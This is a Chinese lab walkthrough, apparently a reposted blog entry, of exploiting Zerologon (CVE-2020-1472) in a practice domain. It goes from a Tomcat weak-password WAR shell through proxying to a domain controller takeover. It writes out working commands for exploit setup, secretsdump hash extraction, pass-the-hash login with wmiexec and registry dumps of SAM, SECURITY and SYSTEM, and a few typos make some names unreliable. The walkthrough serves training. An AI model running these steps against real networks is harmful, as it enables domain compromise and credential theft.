环境搭建:
攻击机kali(192.168.1.109)
win server2008(192.168.1.104)双网卡(域内机器)
域控server2016:xxxx
漏洞描述:
CVE-2020-1472是一个windows域控中严重的远程权限提升漏洞,影响Windows Server 2008R 2至Windows Server 2019的多个版本系统,只要攻击者能访问到目标域控井且知道域控计算机名即可利用该漏洞.该漏洞不要求当前计算机在域内,也不要求当前计算机操作系统为windows,该漏洞的稳定利用方式为重置目标域控的密码, 然后利用城控凭证进行Dc sync获取域管权限后修复域控密码,之所以不直接使用坏控凭证远程执行命令,是因为城控账户是不可以登录的,但是域控具备Dc sync权限, 可以获取域内任意用户的凭证。
漏洞利用过程中会重置域控存储在域中(ntds.dit)的凭证,而域控存储在域中的凭证与本地的注册表/lsass中的凭证不一致时,会导致目标域控脱域,所以在重置完域控凭证后要尽快恢复。
打靶正文:
1、端口扫描
目标有web资产:
2、tomcat弱口令上传war包getshell
3、收集主机信息
通过netstat、ipconfig、route可收集到主机可通往192.168.4.0网段;
通过systeminfo可查询主机是域内机器;
通过net time /doamin可查询域控主机;
定位域控:
nslookup -q=srv _ldap._tcp.dc._msdcs.xiaodi.vpc
或
net time /domain
域控:dc.xiaodi.vpc ip: 192.168.4.20
4、做代理
使用stowaway做代理:
目标机器执行:
windows_x64_agent.exe -l 192.168.1.104:4455 -s joyboy
攻击机执行:
./linux_x64_admin -c 192.168.1.104:4455 -s joyboy
开启socks代理
配置socks代理:
5、打域控
扫描域控是否存在Zerologon(CVE-2020-1472)漏洞
工具准备:
git clone https://github.com/SecuraBV/CVE-2020-1472 #下载POC,用于检测是否存在CVE-2021-1472
git clone https://github.com/dirkjanm/CVE-2020-1472 #下载EXP,用于置空域控密码
git clone https://github.com/risksense/zerologon #用于恢复原始hash,防止脱域等风险
git clone https://github.com/SecureAuthCorp/impacket #选择性下载网络协议包impacket,kali自带。若下载,需要pip install . 来安装
使用poc结果显示目标存在漏洞!!!
使用exp置空域控密码:
通过secresdump来获取域控hash
proxychains4 secretsdump.py 'xiaodi.vpc/dc$@xiaodi.vpc' -just-dc -no-pass
使用wmiexec登录域控:
proxychains4 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:5e7f9efc2634f59c2fab89e99c89afd1 xiaodi.vpc/administrator@192.168.4.20
6、恢复域控密码
在域控主机上从注册表导出hash文件,并下载到本地
reg save HKLMSYSTEM system.hive
reg save HKLMSAM sam.hive
reg save HKLMSECURITY security.hive
lget sam.hive
lget security.hive
lget system.hive
使用secretsdump读取下载到本地的hash文件,获取域控机器账户置空前的原始hash。
secretsdump.py -sam sam.hive -security security.hive -system system.hive LOCAL
记住这个32位hash
使用hash恢复工具,并用命令恢复原来的密码:
proxychains4 python3 reinstall_original_pw.py dc 192.168.4.20 f44b3f823218f4eaa005a77b16186ae
无法使用空密码攻击,成功恢复密码:
原文始发于微信公众号(fly的渗透学习笔记):打靶训练——Netlogon域提权(CVE-2020-1472)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论